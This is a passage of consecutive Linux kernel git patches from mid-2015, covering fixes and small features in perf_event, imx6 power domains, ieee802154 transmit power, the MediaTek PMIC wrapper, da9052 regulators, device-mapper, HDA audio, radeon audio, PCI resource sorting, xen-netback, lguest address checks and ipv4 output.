fix, by recording a safe non-enable register to be used safely for the reading/writing check. Because it is not enabled, this passes on bare metal boxes (like metal), but should continue to throw an msr_fail on Xen guests because the register isn't emulated yet. Now I get a proper bios_fail error message and Xen should still see their msr_fail message (untested). Signed-off-by: Don Zickus Signed-off-by: Peter Zijlstra (Intel) Cc: Linus Torvalds Cc: Peter Zijlstra Cc: Thomas Gleixner Cc: george.dunlap@eu.citrix.com Cc: konrad.wilk@oracle.com Link: http://lkml.kernel.org/r/1431976608-56970-1-git-send-email-dzickus@redhat.com Signed-off-by: Ingo Molnar --- arch/x86/kernel/cpu/perf_event.c | 16 +++++++++++++++- 1 file changed, 15 insertions(+), 1 deletion(-) diff --git a/arch/x86/kernel/cpu/perf_event.c b/arch/x86/kernel/cpu/perf_event.c index 2eca19422454..4f7001f28936 100644 --- a/arch/x86/kernel/cpu/perf_event.c +++ b/arch/x86/kernel/cpu/perf_event.c @@ -190,6 +190,7 @@ static bool check_hw_exists(void) u64 val, val_fail, val_new= ~0; int i, reg, reg_fail, ret = 0; int bios_fail = 0; + int reg_safe = -1; /* * Check to see if the BIOS enabled any of the counters, if so @@ -204,6 +205,8 @@ static bool check_hw_exists(void) bios_fail = 1; val_fail = val; reg_fail = reg; + } else { + reg_safe = i; } } @@ -221,12 +224,23 @@ static bool check_hw_exists(void) } } + /* + * If all the counters are enabled, the below test will always + * fail. The tools will also become useless in this scenario. + * Just fail and disable the hardware counters. + */ + + if (reg_safe == -1) { + reg = reg_safe; + goto msr_fail; + } + /* * Read the current value, change it and read it back to see if it * matches, this is needed to detect certain hardware emulators * (qemu/kvm) that don't trap on the MSR access and always return 0s. */ - reg = x86_pmu_event_addr(0); + reg = x86_pmu_event_addr(reg_safe); if (rdmsrl_safe(reg, &val)) goto msr_fail; val ^= 0xffffUL; From b17c70cd9211e9bbcd77a489f9c60f3d1bd4c392 Mon Sep 17 00:00:00 2001 From: Lucas Stach Date: Wed, 27 May 2015 10:10:26 +0200 Subject: [PATCH 288/872] ARM: imx6: gpc: don't register power domain if DT data is missing If the devicetree is too old and does not provide the regulator and clocks for the power domain, we need to avoid registering the power domain. Otherwise runtime PM will try to control the domain, which will lead to machine hangs without the proper DT configuration data. This restores functionality to the kernel 4.0 level if an old DT is detected, where the power domain is constantly powered on. Signed-off-by: Lucas Stach Signed-off-by: Shawn Guo --- arch/arm/mach-imx/gpc.c | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/arch/arm/mach-imx/gpc.c b/arch/arm/mach-imx/gpc.c index bbf015056221..6d0893a3828e 100644 --- a/arch/arm/mach-imx/gpc.c +++ b/arch/arm/mach-imx/gpc.c @@ -449,6 +449,10 @@ static int imx_gpc_probe(struct platform_device *pdev) struct regulator *pu_reg; int ret; + /* bail out if DT too old and doesn't provide the necessary info */ + if (!of_property_read_bool(pdev->dev.of_node, "#power-domain-cells")) + return 0; + pu_reg = devm_regulator_get_optional(&pdev->dev, "pu"); if (PTR_ERR(pu_reg) == -ENODEV) pu_reg = NULL; From 0f999b09f5c1b135e840501840dbcd01fad66f79 Mon Sep 17 00:00:00 2001 From: Varka Bhadram Date: Wed, 27 May 2015 09:10:54 +0530 Subject: [PATCH 289/872] ieee802154: add set transmit power support This patch adds transmission power setting support for IEEE-802.15.4 devices via nl802154. Signed-off-by: Varka Bhadram Acked-by: Alexander Aring Signed-off-by: Marcel Holtmann --- include/net/cfg802154.h | 1 + net/ieee802154/nl802154.c | 30 ++++++++++++++++++++++++++++++ net/ieee802154/rdev-ops.h | 12 ++++++++++++ net/ieee802154/trace.h | 15 +++++++++++++++ net/mac802154/cfg.c | 19 +++++++++++++++++++ 5 files changed, 77 insertions(+) diff --git a/include/net/cfg802154.h b/include/net/cfg802154.h index 4de59aa96173..2e3bb012c2ff 100644 --- a/include/net/cfg802154.h +++ b/include/net/cfg802154.h @@ -44,6 +44,7 @@ struct cfg802154_ops { int (*set_channel)(struct wpan_phy *wpan_phy, u8 page, u8 channel); int (*set_cca_mode)(struct wpan_phy *wpan_phy, const struct wpan_phy_cca *cca); + int (*set_tx_power)(struct wpan_phy *wpan_phy, s32 power); int (*set_pan_id)(struct wpan_phy *wpan_phy, struct wpan_dev *wpan_dev, __le16 pan_id); int (*set_short_addr)(struct wpan_phy *wpan_phy, diff --git a/net/ieee802154/nl802154.c b/net/ieee802154/nl802154.c index 212a795b33c9..5c9d524ba02c 100644 --- a/net/ieee802154/nl802154.c +++ b/net/ieee802154/nl802154.c @@ -783,6 +783,28 @@ static int nl802154_set_cca_mode(struct sk_buff *skb, struct genl_info *info) return rdev_set_cca_mode(rdev, &cca); } +static int nl802154_set_tx_power(struct sk_buff *skb, struct genl_info *info) +{ + struct cfg802154_registered_device *rdev = info->user_ptr[0]; + s32 power; + int i; + + if (!(rdev->wpan_phy.flags & WPAN_PHY_FLAG_TXPOWER)) + return -EOPNOTSUPP; + + if (!info->attrs[NL802154_ATTR_TX_POWER]) + return -EINVAL; + + power = nla_get_s32(info->attrs[NL802154_ATTR_TX_POWER]); + + for (i = 0; i < rdev->wpan_phy.supported.tx_powers_size; i++) { + if (power == rdev->wpan_phy.supported.tx_powers[i]) + return rdev_set_tx_power(rdev, power); + } + + return -EINVAL; +} + static int nl802154_set_pan_id(struct sk_buff *skb, struct genl_info *info) { struct cfg802154_registered_device *rdev = info->user_ptr[0]; @@ -1093,6 +1115,14 @@ static const struct genl_ops nl802154_ops[] = { .internal_flags = NL802154_FLAG_NEED_WPAN_PHY | NL802154_FLAG_NEED_RTNL, }, + { + .cmd = NL802154_CMD_SET_TX_POWER, + .doit = nl802154_set_tx_power, + .policy = nl802154_policy, + .flags = GENL_ADMIN_PERM, + .internal_flags = NL802154_FLAG_NEED_WPAN_PHY | + NL802154_FLAG_NEED_RTNL, + }, { .cmd = NL802154_CMD_SET_PAN_ID, .doit = nl802154_set_pan_id, diff --git a/net/ieee802154/rdev-ops.h b/net/ieee802154/rdev-ops.h index 7b5a9dd94fe5..36456118a6ec 100644 --- a/net/ieee802154/rdev-ops.h +++ b/net/ieee802154/rdev-ops.h @@ -74,6 +74,18 @@ rdev_set_cca_mode(struct cfg802154_registered_device *rdev, return ret; } +static inline int +rdev_set_tx_power(struct cfg802154_registered_device *rdev, + s32 power) +{ + int ret; + + trace_802154_rdev_set_tx_power(&rdev->wpan_phy, power); + ret = rdev->ops->set_tx_power(&rdev->wpan_phy, power); + trace_802154_rdev_return_int(&rdev->wpan_phy, ret); + return ret; +} + static inline int rdev_set_pan_id(struct cfg802154_registered_device *rdev, struct wpan_dev *wpan_dev, __le16 pan_id) diff --git a/net/ieee802154/trace.h b/net/ieee802154/trace.h index 5ac25eb6ed17..1f1cecc420d7 100644 --- a/net/ieee802154/trace.h +++ b/net/ieee802154/trace.h @@ -93,6 +93,21 @@ TRACE_EVENT(802154_rdev_set_channel, __entry->page, __entry->channel) ); +TRACE_EVENT(802154_rdev_set_tx_power, + TP_PROTO(struct wpan_phy *wpan_phy, s32 power), + TP_ARGS(wpan_phy, power), + TP_STRUCT__entry( + WPAN_PHY_ENTRY + __field(s32, power) + ), + TP_fast_assign( + WPAN_PHY_ASSIGN; + __entry->power = power; + ), + TP_printk(WPAN_PHY_PR_FMT ", power: %d", WPAN_PHY_PR_ARG, + __entry->power) +); + TRACE_EVENT(802154_rdev_set_cca_mode, TP_PROTO(struct wpan_phy *wpan_phy, const struct wpan_phy_cca *cca), TP_ARGS(wpan_phy, cca), diff --git a/net/mac802154/cfg.c b/net/mac802154/cfg.c index d5290ea49dca..ab12fa296eb3 100644 --- a/net/mac802154/cfg.c +++ b/net/mac802154/cfg.c @@ -105,6 +105,24 @@ ieee802154_set_cca_mode(struct wpan_phy *wpan_phy, return ret; } +static int +ieee802154_set_tx_power(struct wpan_phy *wpan_phy, s32 power) +{ + struct ieee802154_local *local = wpan_phy_priv(wpan_phy); + int ret; + + ASSERT_RTNL(); + + if (wpan_phy->transmit_power == power) + return 0; + + ret = drv_set_tx_power(local, power); + if (!ret) + wpan_phy->transmit_power = power; + + return ret; +} + static int ieee802154_set_pan_id(struct wpan_phy *wpan_phy, struct wpan_dev *wpan_dev, __le16 pan_id) @@ -195,6 +213,7 @@ const struct cfg802154_ops mac802154_config_ops = { .del_virtual_intf = ieee802154_del_iface, .set_channel = ieee802154_set_channel, .set_cca_mode = ieee802154_set_cca_mode, + .set_tx_power = ieee802154_set_tx_power, .set_pan_id = ieee802154_set_pan_id, .set_short_addr = ieee802154_set_short_addr, .set_backoff_exponent = ieee802154_set_backoff_exponent, From dec169eccc26b12a533856a7fea87a245c47c11d Mon Sep 17 00:00:00 2001 From: Varka Bhadram Date: Wed, 27 May 2015 14:21:06 +0530 Subject: [PATCH 290/872] ieee802154: fix typo for file name Signed-off-by: Varka Bhadram Signed-off-by: Marcel Holtmann --- net/ieee802154/trace.h | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/net/ieee802154/trace.h b/net/ieee802154/trace.h index 1f1cecc420d7..ac790bb1b4fe 100644 --- a/net/ieee802154/trace.h +++ b/net/ieee802154/trace.h @@ -1,4 +1,4 @@ -/* Based on net/wireless/tracing.h */ +/* Based on net/wireless/trace.h */ #undef TRACE_SYSTEM #define TRACE_SYSTEM cfg802154 From d71c11f3bd2bb0c09e3f08169f5b75dba4b800ea Mon Sep 17 00:00:00 2001 From: Sascha Hauer Date: Tue, 26 May 2015 11:37:43 +0200 Subject: [PATCH 291/872] soc: mediatek: PMIC wrap: Fix clock rate handling replace chipselect extension values based on SPI clock with hardcoded SoC specific values. The PMIC wrapper has the ability of extending the chipselects by configurable amounts of time. We configured the values based on the rate of SPI clock, but this is wrong. The delays should be configured based on the internal PMIC clock that latches the values from the SPI bus to the internal PMIC registers. By default this clock is 24MHz. Other clock frequencies are for debugging only and can be removed from the driver. Signed-off-by: Sascha Hauer Signed-off-by: Matthias Brugger --- drivers/soc/mediatek/mtk-pmic-wrap.c | 42 +++++----------------------- 1 file changed, 7 insertions(+), 35 deletions(-) diff --git a/drivers/soc/mediatek/mtk-pmic-wrap.c b/drivers/soc/mediatek/mtk-pmic-wrap.c index db5be1eec54c..642d6a1a2c43 100644 --- a/drivers/soc/mediatek/mtk-pmic-wrap.c +++ b/drivers/soc/mediatek/mtk-pmic-wrap.c @@ -563,45 +563,17 @@ static int pwrap_init_sidly(struct pmic_wrapper *wrp) static int pwrap_init_reg_clock(struct pmic_wrapper *wrp) { - unsigned long rate_spi; - int ck_mhz; - - rate_spi = clk_get_rate(wrp->clk_spi); - - if (rate_spi > 26000000) - ck_mhz = 26; - else if (rate_spi > 18000000) - ck_mhz = 18; - else - ck_mhz = 0; - - switch (ck_mhz) { - case 18: - if (pwrap_is_mt8135(wrp)) - pwrap_writel(wrp, 0xc, PWRAP_CSHEXT); - pwrap_writel(wrp, 0x4, PWRAP_CSHEXT_WRITE); - pwrap_writel(wrp, 0xc, PWRAP_CSHEXT_READ); - pwrap_writel(wrp, 0x0, PWRAP_CSLEXT_START); - pwrap_writel(wrp, 0x0, PWRAP_CSLEXT_END); - break; - case 26: - if (pwrap_is_mt8135(wrp)) - pwrap_writel(wrp, 0x4, PWRAP_CSHEXT); + if (pwrap_is_mt8135(wrp)) { + pwrap_writel(wrp, 0x4, PWRAP_CSHEXT); pwrap_writel(wrp, 0x0, PWRAP_CSHEXT_WRITE); pwrap_writel(wrp, 0x4, PWRAP_CSHEXT_READ); pwrap_writel(wrp, 0x0, PWRAP_CSLEXT_START); pwrap_writel(wrp, 0x0, PWRAP_CSLEXT_END); - break; - case 0: - if (pwrap_is_mt8135(wrp)) - pwrap_writel(wrp, 0xf, PWRAP_CSHEXT); - pwrap_writel(wrp, 0xf, PWRAP_CSHEXT_WRITE); - pwrap_writel(wrp, 0xf, PWRAP_CSHEXT_READ); - pwrap_writel(wrp, 0xf, PWRAP_CSLEXT_START); - pwrap_writel(wrp, 0xf, PWRAP_CSLEXT_END); - break; - default: - return -EINVAL; + } else { + pwrap_writel(wrp, 0x0, PWRAP_CSHEXT_WRITE); + pwrap_writel(wrp, 0x4, PWRAP_CSHEXT_READ); + pwrap_writel(wrp, 0x2, PWRAP_CSLEXT_START); + pwrap_writel(wrp, 0x2, PWRAP_CSLEXT_END); } return 0; From d956b80ac7a6ba6ee45ac46e969f68dd15b4b729 Mon Sep 17 00:00:00 2001 From: Sascha Hauer Date: Tue, 26 May 2015 11:37:44 +0200 Subject: [PATCH 292/872] soc: mediatek: PMIC wrap: Fix register state machine handling When the PMIC wrapper state machine has read a register it goes into the "wait for valid clear" (vldclr) state. The state machine stays in this state until the VLDCLR bit is written to. We should write this bit after reading a register because the SCPSYS won't let the system go into suspend as long as the state machine waits for valid clear. Since now we never leave the state machine in vldclr state we no longer have to check for this state on pwrap_read/pwrap_write entry and can remove the corresponding code. Signed-off-by: Sascha Hauer Signed-off-by: Matthias Brugger --- drivers/soc/mediatek/mtk-pmic-wrap.c | 12 ++---------- 1 file changed, 2 insertions(+), 10 deletions(-) diff --git a/drivers/soc/mediatek/mtk-pmic-wrap.c b/drivers/soc/mediatek/mtk-pmic-wrap.c index 642d6a1a2c43..f432291feee9 100644 --- a/drivers/soc/mediatek/mtk-pmic-wrap.c +++ b/drivers/soc/mediatek/mtk-pmic-wrap.c @@ -443,11 +443,6 @@ static int pwrap_wait_for_state(struct pmic_wrapper *wrp, static int pwrap_write(struct pmic_wrapper *wrp, u32 adr, u32 wdata) { int ret; - u32 val; - - val = pwrap_readl(wrp, PWRAP_WACS2_RDATA); - if (PWRAP_GET_WACS_FSM(val) == PWRAP_WACS_FSM_WFVLDCLR) - pwrap_writel(wrp, 1, PWRAP_WACS2_VLDCLR); ret = pwrap_wait_for_state(wrp, pwrap_is_fsm_idle); if (ret) @@ -462,11 +457,6 @@ static int pwrap_write(struct pmic_wrapper *wrp, u32 adr, u32 wdata) static int pwrap_read(struct pmic_wrapper *wrp, u32 adr, u32 *rdata) { int ret; - u32 val; - - val = pwrap_readl(wrp, PWRAP_WACS2_RDATA); - if (PWRAP_GET_WACS_FSM(val) == PWRAP_WACS_FSM_WFVLDCLR) - pwrap_writel(wrp, 1, PWRAP_WACS2_VLDCLR); ret = pwrap_wait_for_state(wrp, pwrap_is_fsm_idle); if (ret) @@ -480,6 +470,8 @@ static int pwrap_read(struct pmic_wrapper *wrp, u32 adr, u32 *rdata) *rdata = PWRAP_GET_WACS_RDATA(pwrap_readl(wrp, PWRAP_WACS2_RDATA)); + pwrap_writel(wrp, 1, PWRAP_WACS2_VLDCLR); + return 0; } From e0c21530fa91f119bfca19640a67380c6b14f12a Mon Sep 17 00:00:00 2001 From: Johan Hovold Date: Fri, 15 May 2015 16:27:40 +0200 Subject: [PATCH 293/872] mfd: da9052: Fix broken regulator probe Fix broken probe of da9052 regulators, which since commit b3f6c73db732 ("mfd: da9052-core: Fix platform-device id collision") use a non-deterministic platform-device id to retrieve static regulator information. Fortunately, adequate error handling was in place so probe would simply fail with an error message. Update the mfd-cell ids to be zero-based and use those to identify the cells when probing the regulator devices. Fixes: b3f6c73db732 ("mfd: da9052-core: Fix platform-device id collision") Cc: stable # v3.19 Signed-off-by: Johan Hovold Acked-by: Bartlomiej Zolnierkiewicz Reviewed-by: Mark Brown Signed-off-by: Lee Jones --- drivers/mfd/da9052-core.c | 8 ++++---- drivers/regulator/da9052-regulator.c | 5 +++-- 2 files changed, 7 insertions(+), 6 deletions(-) diff --git a/drivers/mfd/da9052-core.c b/drivers/mfd/da9052-core.c index ae498b53ee40..46e3840c7a37 100644 --- a/drivers/mfd/da9052-core.c +++ b/drivers/mfd/da9052-core.c @@ -431,6 +431,10 @@ int da9052_adc_read_temp(struct da9052 *da9052) EXPORT_SYMBOL_GPL(da9052_adc_read_temp); static const struct mfd_cell da9052_subdev_info[] = { + { + .name = "da9052-regulator", + .id = 0, + }, { .name = "da9052-regulator", .id = 1, @@ -483,10 +487,6 @@ static const struct mfd_cell da9052_subdev_info[] = { .name = "da9052-regulator", .id = 13, }, - { - .name = "da9052-regulator", - .id = 14, - }, { .name = "da9052-onkey", }, diff --git a/drivers/regulator/da9052-regulator.c b/drivers/regulator/da9052-regulator.c index 8a4df7a1f2ee..e628d4c2f2ae 100644 --- a/drivers/regulator/da9052-regulator.c +++ b/drivers/regulator/da9052-regulator.c @@ -394,6 +394,7 @@ static inline struct da9052_regulator_info *find_regulator_info(u8 chip_id, static int da9052_regulator_probe(struct platform_device *pdev) { + const struct mfd_cell *cell = mfd_get_cell(pdev); struct regulator_config config = { }; struct da9052_regulator *regulator; struct da9052 *da9052; @@ -409,7 +410,7 @@ static int da9052_regulator_probe(struct platform_device *pdev) regulator->da9052 = da9052; regulator->info = find_regulator_info(regulator->da9052->chip_id, - pdev->id); + cell->id); if (regulator->info == NULL) { dev_err(&pdev->dev, "invalid regulator ID specified\n"); return -EINVAL; @@ -419,7 +420,7 @@ static int da9052_regulator_probe(struct platform_device *pdev) config.driver_data = regulator; config.regmap = da9052->regmap; if (pdata && pdata->regulators) { - config.init_data = pdata->regulators[pdev->id]; + config.init_data = pdata->regulators[cell->id]; } else { #ifdef CONFIG_OF struct device_node *nproot = da9052->dev->of_node; From 3a1407559a593d4360af12dd2df5296bf8eb0d28 Mon Sep 17 00:00:00 2001 From: Junichi Nomura Date: Wed, 27 May 2015 04:22:07 +0000 Subject: [PATCH 294/872] dm: fix NULL pointer when clone_and_map_rq returns !DM_MAPIO_REMAPPED When stacking request-based DM on blk_mq device, request cloning and remapping are done in a single call to target's clone_and_map_rq(). The clone is allocated and valid only if clone_and_map_rq() returns DM_MAPIO_REMAPPED. The "IS_ERR(clone)" check in map_request() does not cover all the !DM_MAPIO_REMAPPED cases that are possible (E.g. if underlying devices are not ready or unavailable, clone_and_map_rq() may return DM_MAPIO_REQUEUE without ever having established an ERR_PTR). Fix this by explicitly checking for a return that is not DM_MAPIO_REMAPPED in map_request(). Without this fix, DM core may call setup_clone() for a NULL clone and oops like this: BUG: unable to handle kernel NULL pointer dereference at 0000000000000068 IP: [] blk_rq_prep_clone+0x7d/0x137 ... CPU: 2 PID: 5793 Comm: kdmwork-253:3 Not tainted 4.0.0-nm #1 ... Call Trace: [] map_tio_request+0xa9/0x258 [dm_mod] [] kthread_worker_fn+0xfd/0x150 [] ? kthread_parkme+0x24/0x24 [] ? kthread_parkme+0x24/0x24 [] kthread+0xe6/0xee [] ? put_lock_stats+0xe/0x20 [] ? __init_kthread_worker+0x5b/0x5b [] ret_from_fork+0x58/0x90 [] ? __init_kthread_worker+0x5b/0x5b Fixes: e5863d9ad ("dm: allocate requests in target when stacking on blk-mq devices") Reported-by: Bart Van Assche Signed-off-by: Jun'ichi Nomura Signed-off-by: Mike Snitzer Cc: stable@vger.kernel.org # 4.0+ --- drivers/md/dm.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/md/dm.c b/drivers/md/dm.c index 0bf79a0bad37..1c62ed8d09f4 100644 --- a/drivers/md/dm.c +++ b/drivers/md/dm.c @@ -1972,8 +1972,8 @@ static int map_request(struct dm_rq_target_io *tio, struct request *rq, dm_kill_unmapped_request(rq, r); return r; } - if (IS_ERR(clone)) - return DM_MAPIO_REQUEUE; + if (r != DM_MAPIO_REMAPPED) + return r; if (setup_clone(clone, rq, tio, GFP_ATOMIC)) { /* -ENOMEM */ ti->type->release_clone_rq(clone); From 0fa372b6c95013af1334b3d5c9b5f03a70ecedab Mon Sep 17 00:00:00 2001 From: Takashi Iwai Date: Wed, 27 May 2015 16:17:19 +0200 Subject: [PATCH 295/872] ALSA: hda - Fix noise on AMD radeon 290x controller A new AMD controller [1002:aac8] seems to need the quirk for other AMD NS HDMI stuff, otherwise it gives noisy sounds. Bugzilla: https://bugzilla.kernel.org/show_bug.cgi?id=99021 Cc: Signed-off-by: Takashi Iwai --- sound/pci/hda/hda_intel.c | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sound/pci/hda/hda_intel.c b/sound/pci/hda/hda_intel.c index 34040d26c94f..fea198c58196 100644 --- a/sound/pci/hda/hda_intel.c +++ b/sound/pci/hda/hda_intel.c @@ -2089,6 +2089,8 @@ static const struct pci_device_id azx_ids[] = { .driver_data = AZX_DRIVER_ATIHDMI_NS | AZX_DCAPS_PRESET_ATI_HDMI_NS }, { PCI_DEVICE(0x1002, 0xaab0), .driver_data = AZX_DRIVER_ATIHDMI_NS | AZX_DCAPS_PRESET_ATI_HDMI_NS }, + { PCI_DEVICE(0x1002, 0xaac8), + .driver_data = AZX_DRIVER_ATIHDMI_NS | AZX_DCAPS_PRESET_ATI_HDMI_NS }, /* VIA VT8251/VT8237A */ { PCI_DEVICE(0x1106, 0x3288), .driver_data = AZX_DRIVER_VIA | AZX_DCAPS_POSFIX_VIA }, From 2a910d139e405f1038c0f2ea7f9ac45acc84cce9 Mon Sep 17 00:00:00 2001 From: Matthias Brugger Date: Wed, 27 May 2015 14:20:55 +0200 Subject: [PATCH 296/872] soc: mediatek: Add compile dependency to pmic-wrapper MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit The pmic-wrapper calls the reset controller. If CONFIG_RESET_CONTROLLER is not set, compilation fails with: drivers/soc/mediatek/mtk-pmic-wrap.c: In function ‘pwrap_probe’: drivers/soc/mediatek/mtk-pmic-wrap.c:836:2: error: implicit declaration of function ‘devm_reset_control_get’ [-Werror=implicit-function-declaration] This patch sets the dependency in the Kconfig file. Signed-off-by: Matthias Brugger --- drivers/soc/mediatek/Kconfig | 1 + 1 file changed, 1 insertion(+) diff --git a/drivers/soc/mediatek/Kconfig b/drivers/soc/mediatek/Kconfig index bcdb22d5e215..3c1850332a90 100644 --- a/drivers/soc/mediatek/Kconfig +++ b/drivers/soc/mediatek/Kconfig @@ -4,6 +4,7 @@ config MTK_PMIC_WRAP tristate "MediaTek PMIC Wrapper Support" depends on ARCH_MEDIATEK + depends on RESET_CONTROLLER select REGMAP help Say yes here to add support for MediaTek PMIC Wrapper found From 2d1c18bba15daf89d75ce475ecd2068f483aa12f Mon Sep 17 00:00:00 2001 From: Alex Deucher Date: Wed, 27 May 2015 11:43:53 -0400 Subject: [PATCH 297/872] Revert "drm/radeon: only mark audio as connected if the monitor supports it (v3)" This breaks too many things. bugs: https://bugzilla.kernel.org/show_bug.cgi?id=99041 https://bugs.freedesktop.org/show_bug.cgi?id=90681 This reverts commit 0f55db36d49d45b80eff0c0a2a498766016f458b. Cc: stable@vger.kernel.org --- drivers/gpu/drm/radeon/radeon_audio.c | 27 ++++++++++------------ drivers/gpu/drm/radeon/radeon_connectors.c | 8 ++----- 2 files changed, 14 insertions(+), 21 deletions(-) diff --git a/drivers/gpu/drm/radeon/radeon_audio.c b/drivers/gpu/drm/radeon/radeon_audio.c index dcb779647c57..25191f126f3b 100644 --- a/drivers/gpu/drm/radeon/radeon_audio.c +++ b/drivers/gpu/drm/radeon/radeon_audio.c @@ -460,9 +460,6 @@ void radeon_audio_detect(struct drm_connector *connector, if (!connector || !connector->encoder) return; - if (!radeon_encoder_is_digital(connector->encoder)) - return; - rdev = connector->encoder->dev->dev_private; if (!radeon_audio_chipset_supported(rdev)) @@ -471,26 +468,26 @@ void radeon_audio_detect(struct drm_connector *connector, radeon_encoder = to_radeon_encoder(connector->encoder); dig = radeon_encoder->enc_priv; - if (!dig->afmt) - return; - if (status == connector_status_connected) { - struct radeon_connector *radeon_connector = to_radeon_connector(connector); + struct radeon_connector *radeon_connector; + int sink_type; + + if (!drm_detect_monitor_audio(radeon_connector_edid(connector))) { + radeon_encoder->audio = NULL; + return; + } + + radeon_connector = to_radeon_connector(connector); + sink_type = radeon_dp_getsinktype(radeon_connector); if (connector->connector_type == DRM_MODE_CONNECTOR_DisplayPort && - radeon_dp_getsinktype(radeon_connector) == - CONNECTOR_OBJECT_ID_DISPLAYPORT) + sink_type == CONNECTOR_OBJECT_ID_DISPLAYPORT) radeon_encoder->audio = rdev->audio.dp_funcs; else radeon_encoder->audio = rdev->audio.hdmi_funcs; dig->afmt->pin = radeon_audio_get_pin(connector->encoder); - if (drm_detect_monitor_audio(radeon_connector_edid(connector))) { - radeon_audio_enable(rdev, dig->afmt->pin, 0xf); - } else { - radeon_audio_enable(rdev, dig->afmt->pin, 0); - dig->afmt->pin = NULL; - } + radeon_audio_enable(rdev, dig->afmt->pin, 0xf); } else { radeon_audio_enable(rdev, dig->afmt->pin, 0); dig->afmt->pin = NULL; diff --git a/drivers/gpu/drm/radeon/radeon_connectors.c b/drivers/gpu/drm/radeon/radeon_connectors.c index d17d251dbd4f..cebb65e07e1d 100644 --- a/drivers/gpu/drm/radeon/radeon_connectors.c +++ b/drivers/gpu/drm/radeon/radeon_connectors.c @@ -1379,10 +1379,8 @@ radeon_dvi_detect(struct drm_connector *connector, bool force) /* updated in get modes as well since we need to know if it's analog or digital */ radeon_connector_update_scratch_regs(connector, ret); - if (radeon_audio != 0) { - radeon_connector_get_edid(connector); + if (radeon_audio != 0) radeon_audio_detect(connector, ret); - } exit: pm_runtime_mark_last_busy(connector->dev->dev); @@ -1719,10 +1717,8 @@ radeon_dp_detect(struct drm_connector *connector, bool force) radeon_connector_update_scratch_regs(connector, ret); - if (radeon_audio != 0) { - radeon_connector_get_edid(connector); + if (radeon_audio != 0) radeon_audio_detect(connector, ret); - } out: pm_runtime_mark_last_busy(connector->dev->dev); From a6b65983dabceb7ccb1801ee7f5bd421c2704d16 Mon Sep 17 00:00:00 2001 From: Wei Yang Date: Tue, 19 May 2015 14:24:17 +0800 Subject: [PATCH 298/872] PCI: Fix IOV resource sorting by alignment requirement In d74b9027a4da ("PCI: Consider additional PF's IOV BAR alignment in sizing and assigning"), it stores additional alignment in realloc_head and takes this into consideration for assignment. After getting the additional alignment, it reorders the head list so resources with bigger alignment are ahead of resources with smaller alignment. It does this by iterating over the head list and inserting ahead of any resource with smaller alignment. This should be done for the first occurrence, but the code currently iterates over the whole list. Fix this by terminating the loop when we find the first smaller resource in the head list. [bhelgaas: changelog] Fixes: d74b9027a4da ("PCI: Consider additional PF's IOV BAR alignment in sizing and assigning") Signed-off-by: Wei Yang Signed-off-by: Bjorn Helgaas --- drivers/pci/setup-bus.c | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/drivers/pci/setup-bus.c b/drivers/pci/setup-bus.c index 4fd0cacf7ca0..aa281d909eb0 100644 --- a/drivers/pci/setup-bus.c +++ b/drivers/pci/setup-bus.c @@ -435,9 +435,11 @@ static void __assign_resources_sorted(struct list_head *head, list_for_each_entry(dev_res2, head, list) { align = pci_resource_alignment(dev_res2->dev, dev_res2->res); - if (add_align > align) + if (add_align > align) { list_move_tail(&dev_res->list, &dev_res2->list); + break; + } } } From ce0e5c522d3924090c20e774359809a7aa08c44c Mon Sep 17 00:00:00 2001 From: Ross Lagerwall Date: Wed, 27 May 2015 11:44:32 +0100 Subject: [PATCH 299/872] xen/netback: Properly initialize credit_bytes Commit e9ce7cb6b107 ("xen-netback: Factor queue-specific data into queue struct") introduced a regression when moving queue-specific data into the queue struct by failing to set the credit_bytes field. This prevented bandwidth limiting from working. Initialize the field as it was done before multiqueue support was added. Signed-off-by: Ross Lagerwall Acked-by: Wei Liu Signed-off-by: David S. Miller --- drivers/net/xen-netback/xenbus.c | 1 + 1 file changed, 1 insertion(+) diff --git a/drivers/net/xen-netback/xenbus.c b/drivers/net/xen-netback/xenbus.c index 3d8dbf5f2d39..fee02414529e 100644 --- a/drivers/net/xen-netback/xenbus.c +++ b/drivers/net/xen-netback/xenbus.c @@ -793,6 +793,7 @@ static void connect(struct backend_info *be) goto err; } + queue->credit_bytes = credit_bytes; queue->remaining_credit = credit_bytes; queue->credit_usec = credit_usec; From 83a35114d0e4583e6b0ca39502e68b6a92e2910c Mon Sep 17 00:00:00 2001 From: Rusty Russell Date: Wed, 27 May 2015 10:59:26 +0930 Subject: [PATCH 300/872] lguest: fix out-by-one error in address checking. This bug has been there since day 1; addresses in the top guest physical page weren't considered valid. You could map that page (the check in check_gpte() is correct), but if a guest tried to put a pagetable there we'd check that address manually when walking it, and kill the guest. Signed-off-by: Rusty Russell Cc: stable@kernel.org Signed-off-by: Linus Torvalds --- drivers/lguest/core.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/lguest/core.c b/drivers/lguest/core.c index 7dc93aa004c8..312ffd3d0017 100644 --- a/drivers/lguest/core.c +++ b/drivers/lguest/core.c @@ -173,7 +173,7 @@ static void unmap_switcher(void) bool lguest_address_ok(const struct lguest *lg, unsigned long addr, unsigned long len) { - return (addr+len) / PAGE_SIZE < lg->pfn_limit && (addr+len >= addr); + return addr+len <= lg->pfn_limit * PAGE_SIZE && (addr+len >= addr); } /* From c5501eb3406d0f88b3efb2c437c4c40b35f865d8 Mon Sep 17 00:00:00 2001 From: Florian Westphal Date: Fri, 22 May 2015 16:32:50 +0200 Subject: [PATCH 301/872] net: ipv4: avoid repeated calls to ip_skb_dst_mtu helper ip_skb_dst_mtu is small inline helper, but its called in several places. before: 17061 44 0 17105 42d1 net/ipv4/ip_output.o after: 16805 44 0 16849 41d1 net/ipv4/ip_output.o Signed-off-by: Florian Westphal Acked-by: Hannes Frederic Sowa Signed-off-by: David S. Miller --- net/ipv4/ip_output.c | 19 ++++++++++++------- 1 file changed, 12 insertions(+), 7 deletions(-) diff --git a/net/ipv4/ip_output.c b/net/ipv4/ip_output.c index 451b009dae75..d6dd8ba04441 100644 --- a/net/ipv4/ip_output.c +++ b/net/ipv4/ip_output.c @@ -84,6 +84,7 @@ int sysctl_ip_default_ttl __read_mostly = IPDEFTTL; EXPORT_SYMBOL(sysctl_ip_default_ttl); static int ip_fragment(struct sock *sk, struct sk_buff *skb, + unsigned int 